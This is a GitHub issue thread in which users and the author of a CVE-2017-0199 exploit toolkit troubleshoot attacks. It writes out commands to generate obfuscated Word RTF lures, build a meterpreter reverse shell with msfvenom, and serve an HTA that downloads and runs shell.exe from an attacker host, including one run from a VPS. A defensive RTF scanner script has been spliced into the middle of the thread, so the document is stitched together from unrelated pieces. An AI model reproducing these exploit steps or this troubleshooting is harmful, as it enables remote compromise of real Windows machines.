Closed jooeji closed 7 years ago
Hi, could you please share the command you used to generate RTF?
python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://my ip/logo.doc
and the RTF opened with the error [There is not enough memory or disk space to display or print a picture], and the payload is unable to execute successfully
This message is fine, it is an expected alert.
Did you use following command to generate RTF with attacker IP address as 192.168.150.137?
python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.150.137/logo.doc
I suspect that your attacker-side IP address should be 192.168.140.137 and not 192.168.150.137 if both the attacker and the victim you are trying are in the same broadcast domain (/24 LAN).
From the screenshot you shared it looks like you might have mistyped the shell location as http://192.168.150.137/shell.exe instead of http://192.168.140.137/shell.exe
@bhdresh In my case, the exploit RTF worked: once the victim opens the RTF, I receive a GET request, but nothing happened after I sent the HTTP request with your malicious JS script that uses PowerShell to download shell.exe from a remote server. I'll try to use Wireshark on the victim's machine to see what's going on. Thanks for sharing the code.
@EdwardAutumn , thank you for your comment.
Maybe it is because the victim does not have administrator privileges to deal with PowerShell, or the version of Office is patched.
Could you please share the PCAP with me at bhdresh@gmail.com to dig in?
I faced the same feedback as the questioner, but I'm sure I didn't mistype the IP address. The commands I used are as below:
Hi @fuxiaoye
Could you please share the screenshots or commands which you have used?
Regards, -Bhadresh
root@kali:/tmp# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.1.218/logo.doc -x 1
Generating obfuscated RTF file.
Generated obfuscated Invoice.rtf successfully
root@kali:/tmp# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.218 LPORT=4444 -f exe > /tmp/shell.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
root@kali:/tmp# python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.218/shell.exe -l /tmp/shell.exe
Running exploit mode (Deliver HTA + Payload) - waiting for victim to connect
Server Running on : 80
Received GET method from 192.168.1.192
Help~~! Thanks!
And there's no response in the other terminal; it stops at "Starting the payload handler..."
Thank you @fuxiaoye
Could you please confirm that the user who opens the RTF at 192.168.1.192 has administrator privileges on the system? Because the pushed HTA will use PowerShell to download shell.exe, and to deal with PowerShell the user needs administrator privileges.
I built a Windows 2003 virtual machine on VirtualBox; it has only one user, the administrator.
The Office is 2010. Help, please!
@fuxiaoye, try the following:
1) Create a file calc.hta with the following inside it,
2) Start the script with the following parameters,
python cve-2017-0199.py -M exp -H calc.hta
3) Open the generated RTF file on the target.
Please share whether you are able to pop up calc.exe on the target.
@bhdresh Sorry, not able to pop up calc.exe on the target. The terminal says:
root@kali:/tmp# python cve-2017-0199_toolkit.py -M exp -H calc.hta
Running exploit mode (Deliver Custom HTA) - waiting for victim to connect
Server Running on : 80
Received request for custom HTA from 192.168.1.192
@fuxiaoye, this indicates that the setup you are targeting is not vulnerable to CVE-2017-0199.
Would you please share the setup of your target, like Windows version and Office version? I'd be quite grateful, please.
Mine is Windows 7 64-bit SP1 + Office Professional Plus 2013.
PS: A fresh installation of Windows 7 SP1 without any update history is not vulnerable (https://www.youtube.com/watch?v=ac6LM7WAx64)
Regards, -Bhadresh
Hello, it's me again. This time I built a virtual machine with Windows Server 2008 SP1 and Office 2016, which this article says is vulnerable: https://nvd.nist.gov/vuln/search/results?adv_search=false&form_type=basic&results_type=overview&search_type=all&query=cve-2017-0199 Unfortunately, the result is still unsatisfactory. It's weird that the console received "GET method from 192.168.1.218", which is the attacker's local address. Help, please!
I modified the network of the virtual machine from NAT to bridged and the IP is normal now. But there's still no request for the payload...
Please try to deliver calc.hta to ensure it's vulnerable.
Hello bro, you've really been helpful, but I am still having an issue with my HTA file being executed. I tested the HTA file before running the script command and it was OK. But I tried your calc HTA and calc popped up. I do not know if this has to do with the HTA file I am using, maybe because it is download & exec. Anyone with another HTA file other than one executing calc? I will be glad if I can get to the bottom of this.
Regards All.
Hi,
If you were able to pop the calc, that means your setup is vulnerable and you should be able to exploit further.
If you want to deliver your custom HTA file, just use the -H option with -M exp. If this doesn't work, check your HTA code.
If you want to deliver an exe payload, use the -e and -l options with -M exp.
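The RTF produced by -M gen in this thread works by embedding a linked OLE object whose target is a URL and asking Word to refresh it when the file is opened. As an added example, not code from the CVE-2017-0199 toolkit or from anyone in this thread, here is a small Python scanner a defender could run over documents to flag that pattern: it checks for the \objautlink and \objupdate control words, decodes the \objdata hex blob, and looks inside it for the URL moniker CLSID and any UTF-16LE http(s) URLs. The two sample RTF strings are constructed for the demo, and the lure blob models only the fields the scanner keys on, not the full OLE stream layout.

```python
"""Static scan of an RTF for the remote OLE-link pattern used by CVE-2017-0199 lures.

Added example (not part of the CVE-2017-0199 toolkit or this thread). It looks for
the control words the exploit depends on (\\objautlink / \\objupdate), decodes the
\\objdata hex payload, and checks it for a URL moniker CLSID and embedded
UTF-16LE URLs. The sample inputs below are constructed for this demo.
"""
import re

# CLSID_StdURLMoniker {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B} as laid out on disk
# (first three fields little-endian). Its presence in an OLE object means the
# object links to a remote resource rather than embedding a file.
URL_MONIKER_CLSID = bytes.fromhex("E0C9EA79F9BACE118C8200AA004BA90B")

# Hex run following a \objdata control word, up to the closing brace.
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9A-Fa-f\s]+)")
# http:// or https:// followed by printable ASCII, encoded as UTF-16LE.
URL_UTF16_RE = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+"
)


def has_control_word(rtf: str, word: str) -> bool:
    """True if \\<word> appears as a complete RTF control word (not a prefix of another)."""
    return re.search(r"\\" + word + r"(?![A-Za-z])", rtf) is not None


def objdata_blobs(rtf: str) -> list:
    """Decode every \\objdata hex run into bytes (whitespace between digits is legal RTF)."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(r"\s+", "", m.group(1))
        hexdata = hexdata[: len(hexdata) - len(hexdata) % 2]  # drop a dangling nibble
        blobs.append(bytes.fromhex(hexdata))
    return blobs


def scan_rtf(rtf: str) -> dict:
    """Report the CVE-2017-0199 indicators found in an RTF document."""
    blobs = objdata_blobs(rtf)
    urls = []
    for blob in blobs:
        urls.extend(m.group(0).decode("utf-16-le") for m in URL_UTF16_RE.finditer(blob))
    result = {
        "objautlink": has_control_word(rtf, "objautlink"),
        "objupdate": has_control_word(rtf, "objupdate"),
        "url_moniker": any(URL_MONIKER_CLSID in b for b in blobs),
        "urls": urls,
    }
    # A linked object pointing at a URL that Word is told to refresh on open is the
    # shape of the exploit document; an embedded object with no URL is not.
    result["suspicious"] = (result["url_moniker"] or bool(urls)) and (
        result["objautlink"] or result["objupdate"]
    )
    return result


def _wrap(hexstr: str, width: int = 64) -> str:
    """Break a hex string into lines, as RTF writers do for \\objdata."""
    return "\n".join(hexstr[i:i + width] for i in range(0, len(hexstr), width))


# Constructed lure: an OLE1-style header, the URL moniker CLSID and a UTF-16LE link
# target. Only the fields the scanner keys on are modelled (assumption, not a real file).
_LURE_BLOB = (
    b"\x01\x05\x00\x00\x02\x00\x00\x00"
    + URL_MONIKER_CLSID
    + "http://192.168.1.218/logo.doc".encode("utf-16-le")
    + b"\x00\x00"
)
LURE_RTF = (
    "{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objclass Word.Document.8}"
    "{\\*\\objdata " + _wrap(_LURE_BLOB.hex()) + "}}}"
)

# Constructed benign document: an embedded (not linked) object with no URL inside.
BENIGN_RTF = (
    "{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Package}"
    "{\\*\\objdata 0105000002000000}}}"
)

if __name__ == "__main__":
    for name, doc in (("lure", LURE_RTF), ("benign", BENIGN_RTF)):
        print(name, scan_rtf(doc))
```

Run it on a real generated RTF by reading the file as text and passing it to scan_rtf; the URL list tells you which host the document will fetch from, which is also the host to look for in proxy and DNS logs when triaging an opened lure.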
I tried the .exe payload but got this in the image below.
using the commands below:
cve-2017-0199_toolkit.py -M gen -w prospers.rtf -u http://myvpsIP/logo.doc -x 1
cve-2017-0199_toolkit.py -M exp -p 72 -e http://myvpsIP/shell.exe -l shell.exe
But when tested on a local machine using 2 VMs (Kali Linux and Windows 8 32-bit) it works perfectly, but when tried on my VPS I got the error in the image above.
Hi, it seems the setup is working fine but the payload (shell.exe) is not compatible with the target. Try to generate a compatible payload.
This is me trying it. This is you trying it. So why?